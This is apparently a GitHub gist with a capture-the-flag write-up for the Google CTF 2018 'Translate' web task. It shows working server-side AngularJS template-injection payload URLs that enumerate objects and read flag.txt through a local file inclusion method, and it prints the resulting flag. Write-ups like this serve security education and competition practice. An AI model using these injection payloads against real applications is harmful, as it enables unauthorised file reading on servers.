Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Google CTF 2018 Quals: Translate web task solution
This web application implements a translation service with dictionary stored in memory.
One can dump the JSON dictionary and add values to it.
Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are rather web-site messages, not the words).
The solution is to overwrite the rendered dictionary value and to enumerate methods accessible inside AngularJS sandbox and find a method which allows local file inclusion.
Executing Object.keys():
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}}
Reading the flag:
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{this.$parent.$parent.i18n.template(%27flag.txt%27)}}
or simply:
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.template(%27flag.txt%27)}}
=>
Result can be accessed on http://translate.ctfcompetition.com:1337/?query=in_lang_query_is_spelled&lang=fr:
CTF{Televersez_vos_exploits_dans_mon_nuagiciel}
One could also just bruteforce or guess the method name ("template").
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment